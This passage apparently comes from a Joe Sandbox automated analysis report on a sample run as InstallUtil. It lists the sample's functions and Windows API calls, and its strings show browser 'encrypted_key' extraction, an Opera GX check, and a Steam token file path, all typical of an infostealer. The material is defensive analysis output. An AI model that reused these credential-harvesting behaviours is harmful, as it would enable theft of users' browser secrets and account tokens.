                                                                                                                    • Part of subcall function 6C6335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6335E0
                                                                                                                    • Part of subcall function 6C6335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6335FD
                                                                                                                    • Part of subcall function 6C6335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C63363F
                                                                                                                    • Part of subcall function 6C6335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C63369F
                                                                                                                    • Part of subcall function 6C6335A0: __aulldiv.LIBCMT ref: 6C6336E4
                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C63309F
                                                                                                                    • Part of subcall function 6C655B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6556EE,?,00000001), ref: 6C655B85
                                                                                                                    • Part of subcall function 6C655B50: EnterCriticalSection.KERNEL32(6C6BF688,?,?,?,6C6556EE,?,00000001), ref: 6C655B90
                                                                                                                    • Part of subcall function 6C655B50: LeaveCriticalSection.KERNEL32(6C6BF688,?,?,?,6C6556EE,?,00000001), ref: 6C655BD8
                                                                                                                    • Part of subcall function 6C655B50: GetTickCount64.KERNEL32 ref: 6C655BE4
                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6330BE
                                                                                                                    • Part of subcall function 6C6330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C633127
                                                                                                                    • Part of subcall function 6C6330F0: __aulldiv.LIBCMT ref: 6C633140
                                                                                                                    • Part of subcall function 6C66AB2A: __onexit.LIBCMT ref: 6C66AB30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492448452.000000006C630000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492911108.000000006C6BE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492934435.000000006C6C2000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4291168024-0
                                                                                                                  • Opcode ID: 24183111232d19a8f63c4793b99bc33270f07ceee6873780b7deaf30f040ad83
                                                                                                                  • Instruction ID: c3b40ed250da526f26091d83108744386f3f93b09c7d449f8cb877643832744d
                                                                                                                  • Opcode Fuzzy Hash: 24183111232d19a8f63c4793b99bc33270f07ceee6873780b7deaf30f040ad83
                                                                                                                  • Instruction Fuzzy Hash: 44F0F91AE2074996CB10DF3A88D11E67370AF6B114F50232AEC4863531FB2061F883DF
                                                                                                                  Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                  • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocateComputerNameProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1664310425-0
                                                                                                                  • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                  • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                  • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                  • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                  Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                  • String ID: Opera GX
                                                                                                                  • API String ID: 1719890681-3280151751
                                                                                                                  • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                  • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                  • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                  • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                  Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-3916222277
                                                                                                                  • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                  • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                  • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                  • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                  Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                  • API String ID: 502913869-3507145866
                                                                                                                  • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                  • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                  • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                  • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                  Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocLocal
                                                                                                                  • String ID: 1iA
                                                                                                                  • API String ID: 3494564517-1863120733
                                                                                                                  • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                  • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                  • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                  • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                  Function 00409072 Relevance: 2.7, APIs: 2, Instructions: 163stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409209
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409224
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2500673778-0
                                                                                                                  • Opcode ID: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                                                  • Instruction ID: 27ee426b6b58d638c78c42283a2d386f26495828f80e9e64967a6f8c5e3c9e1b
                                                                                                                  • Opcode Fuzzy Hash: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                                                  • Instruction Fuzzy Hash: 49513D71A00119ABCF01FFA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99
                                                                                                                  Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                  • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                  • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                  • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                  Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 0041CBC9
                                                                                                                    • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                    • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                    • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                  • malloc.MSVCRT ref: 0041CC06
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc$lstrcpylstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2974738957-0
                                                                                                                  • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                  • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                  • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                  • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                  Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                  • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
